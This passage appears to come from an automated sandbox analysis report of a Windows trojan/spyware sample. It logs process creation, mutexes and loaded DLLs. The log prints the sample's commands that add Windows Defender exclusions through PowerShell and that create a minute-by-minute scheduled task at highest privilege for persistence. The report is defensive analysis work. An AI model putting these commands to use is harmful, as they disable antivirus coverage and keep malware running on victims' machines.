                      Source: java.exe.0.dr, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: java.exe.0.dr, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/25@1/3
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\java.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Users\user\AppData\Roaming\java.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:120:WilError_03
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\mei9G7f5idjyuPFm
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\java.exe C:\Users\user\AppData\Roaming\java.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\java.exe "C:\Users\user\AppData\Roaming\java.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\java.exe "C:\Users\user\AppData\Roaming\java.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\java.exe C:\Users\user\AppData\Roaming\java.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
